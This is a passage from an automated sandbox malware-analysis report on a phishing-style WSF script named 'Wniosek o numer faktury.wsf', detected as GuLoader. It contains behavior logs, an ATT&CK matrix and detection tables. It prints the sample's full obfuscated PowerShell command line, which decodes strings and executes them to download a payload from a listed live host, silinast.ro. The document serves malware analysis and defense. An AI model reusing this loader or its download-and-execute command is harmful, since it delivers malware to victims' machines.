      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4175Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5737Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6280Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000005.00000002.4646772637.0000015DEFA40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllre
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_1336.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1336, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677eJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Semicellulous Sasia Afblsningers fortification Ungarbejderens #>;$Jestenenes='sollegeme';<#Perspiration Widish Redobles Foresprgerens Snobbisme #>;$Bromatologiens=$Lorelei128+$host.'PrivateData';If ($Bromatologiens) {$Boutonnieres++;}function Citationstegnet($Praepuce){$Firewarden117=$udnyttedes+$Praepuce.Length-$Boutonnieres; for( $Udfladningerne1=7;$Udfladningerne1 -lt $Firewarden117;$Udfladningerne1+=8){$Beritt='Affaldsbortskaffelsesomraaderne';$fumitories+=$Praepuce[$Udfladningerne1];$Exsectile='Impieties';}$fumitories;}function Humiria($Skdefrakkernes){ . ($Kaste) ($Skdefrakkernes);}$Udfladningerne1vyberry=Citationstegnet 'ChienfoMWingle o FrkapszSkyttesiNonshatl Vab erlNonch maKrydr s/ Cons q5 Coni i. Ophiur0Udebliv modpart(MilepleWSti lehiTak artnReirrigdUfrihedojubilizw angforsAtletis NedslagNBedrageT Defade Kuponen1Teredos0,budent.Cybercu0Matinmx;Maskinm GrskkatW UdspiniBoiler nLongw y6Mayos,v4 Anthro;S eavep Tras.expar tid6Tabanu 4Frifind;Hushold lseligrRke ispvabashle: N napp1 Pererr2 efleks1 Neutra.Recons 0H lvled) Compos esuetuG Bortf eO.gngelcSoricidkVolcanooZonesys/Glosser2Forvold0Turloug1Melleml0 nie,zs0G,lvano1F lthro0 Ristni1Landbru Lommer,FSkalkesi Sel,plrTorskeneHydrofofKonditoosiderocx kledis/Hjemt,g1 Ca,lal2 Tikkes1Nor ann.Ind atn0Ordrere ';$Aprilsnars190=Citationstegnet 'PropounUDyb rysS KongebE lozengrin issu-A,kelleaKoncis gBusfor eViewyyaN HercogTLrerudd ';$Maalestationernes=Citationstegnet 'RbdigsthPhilomatArseniutKaolinapVrdido :.wfulle/.rocaic/PuppetlsJacalsii F,rulylHepht eiMaaleren epersoau,creatsLicentitConnuan.KontrrernontyphoPondero/ UnguicJ,ongfeluDyrtidsgAfgrelslThro,doa niformn charondPrefectiTv,ngsinEksdik..Kin.redxType odtkristanpInd ull ';$Terroristens=Citationstegnet 'eft rml>Deseca ';$Kaste=Citationstegnet 'U derviicephaloeLaiciziX Perfor ';$Halibuts='Layland';$Darlenes='\Kassestrimmelens.Aft';Humiria (Citationstegnet 'Heft,gt$SkridtbGCrotonil KrystaOAbstracBpurdasiAUdsor el N,nges:Udsag kA .anthodRefas,emUncharii SuppleNPostsaci ewspapsGenvlgetD,ekcyaRNonunciA Hulds T IlliciiKvittero MorfinNEpilogisPreentepDrun,enrCus ekdOTvetandGtrkgardrLitera ABeijingM ic.orsmAlarmereSthammerInd fry=Undersk$Sur,useeSeweragNMllerenVTa kats:UndightACentralpdristerPF cellid StorstAEgomanit Sku spAMe,meri+ Pander$LinguovDKlvandkaBelliferGinglymLCumsha,EAlmennyN VarmlueBrugsmsSAnorect ');Humiria (Citationstegnet 'Viziera$AdemonigPr teifLArbejdeoVan fribMixologaAfkodnilUnderme:RegnefuUaksiomaPIncongeS Fo beheScorevatHypos rTEncr,ptaKonversl Opmarc=Economb$TrimolemOpstaada VegetaaUvrdigtlEnsurege Vo dgiS EngberT redsaAImp,ritT ArvelsiPekingeO Inthron andsynEDemoniaRAffaldsNSympatiEOverlegsFastlaa.H.vregrSSandslopBestriplMisogynimycelietoverjoy(Hagge,e$ Af,tantUnarcheeSilikatrB sgader,hasiluoFremholRDgn.rveIMiscoloS.pildolTPo letreIsocampN SubsidsBlodser)Strepto ');Humiria (Citationstegnet 'ContralJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677eJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#semicellulous sasia afblsningers fortification ungarbejderens #>;$jestenenes='sollegeme';<#perspiration widish redobles foresprgerens snobbisme #>;$bromatologiens=$lorelei128+$host.'privatedata';if ($bromatologiens) {$boutonnieres++;}function citationstegnet($praepuce){$firewarden117=$udnyttedes+$praepuce.length-$boutonnieres; for( $udfladningerne1=7;$udfladningerne1 -lt $firewarden117;$udfladningerne1+=8){$beritt='affaldsbortskaffelsesomraaderne';$fumitories+=$praepuce[$udfladningerne1];$exsectile='impieties';}$fumitories;}function humiria($skdefrakkernes){ . ($kaste) ($skdefrakkernes);}$udfladningerne1vyberry=citationstegnet 'chienfomwingle o frkapszskyttesinonshatl vab erlnonch makrydr s/ cons q5 coni i. ophiur0udebliv modpart(mileplewsti lehitak artnreirrigdufrihedojubilizw angforsatletis nedslagnbedraget defade kuponen1teredos0,budent.cybercu0matinmx;maskinm grskkatw udspiniboiler nlongw y6mayos,v4 anthro;s eavep tras.expar tid6tabanu 4frifind;hushold lseligrrke ispvabashle: n napp1 pererr2 efleks1 neutra.recons 0h lvled) compos esuetug bortf eo.gngelcsoricidkvolcanoozonesys/glosser2forvold0turloug1melleml0 nie,zs0g,lvano1f lthro0 ristni1landbru lommer,fskalkesi sel,plrtorskenehydrofofkonditoosiderocx kledis/hjemt,g1 ca,lal2 tikkes1nor ann.ind atn0ordrere ';$aprilsnars190=citationstegnet 'propounudyb ryss kongebe lozengrin issu-a,kelleakoncis gbusfor eviewyyan hercogtlrerudd ';$maalestationernes=citationstegnet 'rbdigsthphilomatarseniutkaolinapvrdido :.wfulle/.rocaic/puppetlsjacalsii f,rulylhepht eimaaleren epersoau,creatslicentitconnuan.kontrrernontyphopondero/ unguicj,ongfeludyrtidsgafgrelslthro,doa niformn charondprefectitv,ngsineksdik..kin.redxtype odtkristanpind ull ';$terroristens=citationstegnet 'eft rml>deseca ';$kaste=citationstegnet 'u derviicephaloelaicizix perfor ';$halibuts='layland';$darlenes='\kassestrimmelens.aft';humiria (citationstegnet 'heft,gt$skridtbgcrotonil krystaoabstracbpurdasiaudsor el n,nges:udsag ka .anthodrefas,emuncharii supplenpostsaci ewspapsgenvlgetd,ekcyarnonuncia hulds t illiciikvittero morfinnepilogispreentepdrun,enrcus ekdotvetandgtrkgardrlitera abeijingm ic.orsmalarmeresthammerind fry=undersk$sur,useeseweragnmllerenvta kats:undightacentralpdristerpf cellid storstaegomanit sku spame,meri+ pander$linguovdklvandkabelliferginglymlcumsha,ealmennyn varmluebrugsmssanorect ');humiria (citationstegnet 'viziera$ademonigpr teiflarbejdeovan fribmixologaafkodnilunderme:regnefuuaksiomapinconges fo behescorevathypos rtencr,ptakonversl opmarc=economb$trimolemopstaada vegetaauvrdigtlensurege vo dgis engbert redsaaimp,ritt arvelsipekingeo inthron andsynedemoniaraffaldsnsympatieoverlegsfastlaa.h.vregrssandslopbestriplmisogynimycelietoverjoy(hagge,e$ af,tantunarcheesilikatrb sgader,hasiluofremholrdgn.rveimiscolos.pildoltpo letreisocampn subsidsblodser)strepto ');humiria (citationstegnet 'contral
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#semicellulous sasia afblsningers fortification ungarbejderens #>;$jestenenes='sollegeme';<#perspiration widish redobles foresprgerens snobbisme #>;$bromatologiens=$lorelei128+$host.'privatedata';if ($bromatologiens) {$boutonnieres++;}function citationstegnet($praepuce){$firewarden117=$udnyttedes+$praepuce.length-$boutonnieres; for( $udfladningerne1=7;$udfladningerne1 -lt $firewarden117;$udfladningerne1+=8){$beritt='affaldsbortskaffelsesomraaderne';$fumitories+=$praepuce[$udfladningerne1];$exsectile='impieties';}$fumitories;}function humiria($skdefrakkernes){ . ($kaste) ($skdefrakkernes);}$udfladningerne1vyberry=citationstegnet 'chienfomwingle o frkapszskyttesinonshatl vab erlnonch makrydr s/ cons q5 coni i. ophiur0udebliv modpart(mileplewsti lehitak artnreirrigdufrihedojubilizw angforsatletis nedslagnbedraget defade kuponen1teredos0,budent.cybercu0matinmx;maskinm grskkatw udspiniboiler nlongw y6mayos,v4 anthro;s eavep tras.expar tid6tabanu 4frifind;hushold lseligrrke ispvabashle: n napp1 pererr2 efleks1 neutra.recons 0h lvled) compos esuetug bortf eo.gngelcsoricidkvolcanoozonesys/glosser2forvold0turloug1melleml0 nie,zs0g,lvano1f lthro0 ristni1landbru lommer,fskalkesi sel,plrtorskenehydrofofkonditoosiderocx kledis/hjemt,g1 ca,lal2 tikkes1nor ann.ind atn0ordrere ';$aprilsnars190=citationstegnet 'propounudyb ryss kongebe lozengrin issu-a,kelleakoncis gbusfor eviewyyan hercogtlrerudd ';$maalestationernes=citationstegnet 'rbdigsthphilomatarseniutkaolinapvrdido :.wfulle/.rocaic/puppetlsjacalsii f,rulylhepht eimaaleren epersoau,creatslicentitconnuan.kontrrernontyphopondero/ unguicj,ongfeludyrtidsgafgrelslthro,doa niformn charondprefectitv,ngsineksdik..kin.redxtype odtkristanpind ull ';$terroristens=citationstegnet 'eft rml>deseca ';$kaste=citationstegnet 'u derviicephaloelaicizix perfor ';$halibuts='layland';$darlenes='\kassestrimmelens.aft';humiria (citationstegnet 'heft,gt$skridtbgcrotonil krystaoabstracbpurdasiaudsor el n,nges:udsag ka .anthodrefas,emuncharii supplenpostsaci ewspapsgenvlgetd,ekcyarnonuncia hulds t illiciikvittero morfinnepilogispreentepdrun,enrcus ekdotvetandgtrkgardrlitera abeijingm ic.orsmalarmeresthammerind fry=undersk$sur,useeseweragnmllerenvta kats:undightacentralpdristerpf cellid storstaegomanit sku spame,meri+ pander$linguovdklvandkabelliferginglymlcumsha,ealmennyn varmluebrugsmssanorect ');humiria (citationstegnet 'viziera$ademonigpr teiflarbejdeovan fribmixologaafkodnilunderme:regnefuuaksiomapinconges fo behescorevathypos rtencr,ptakonversl opmarc=economb$trimolemopstaada vegetaauvrdigtlensurege vo dgis engbert redsaaimp,ritt arvelsipekingeo inthron andsynedemoniaraffaldsnsympatieoverlegsfastlaa.h.vregrssandslopbestriplmisogynimycelietoverjoy(hagge,e$ af,tantunarcheesilikatrb sgader,hasiluofremholrdgn.rveimiscolos.pildoltpo letreisocampn subsidsblodser)strepto ');humiria (citationstegnet 'contralJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information22
      Scripting      		Valid Accounts2
      Command and Scripting Interpreter      		22
      Scripting      		11
      Process Injection      		1
      Masquerading      		OS Credential Dumping1
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Exploitation for Client Execution      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell      		Logon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture12
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets1
      Remote System Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
      System Network Configuration Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      File and Directory Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
      System Information Discovery      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Wniosek o numer faktury.wsf24%ReversingLabsScript-WScript.Trojan.GuLoader
      Wniosek o numer faktury.wsf19%VirustotalBrowse

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      silinast.ro10%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://nuget.org/NuGet.exe0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      https://nuget.org/nuget.exe0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      https://aka.ms/pscore680%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
      http://silinast.ro10%VirustotalBrowse
      https://github.com/Pester/Pester1%VirustotalBrowse

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      silinast.ro
      		188.241.183.45
      		truefalseunknown
      6777.6777.6777.677e
      		unknown
      		unknowntrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://silinast.ro/Juglandin.xtptrue
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://silinast.ropowershell.exe, 00000005.00000002.4613344132.0000015D81CC0000.00000004.00000800.00020000.00000000.sdmptrueunknown
          http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.4640956886.0000015D901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4640956886.0000015D90071000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://silinast.ro(powershell.exe, 00000005.00000002.4613344132.0000015D8166A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81928000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81BA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D815C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81D6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D813E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D8188B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D813A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D80FCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D817EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 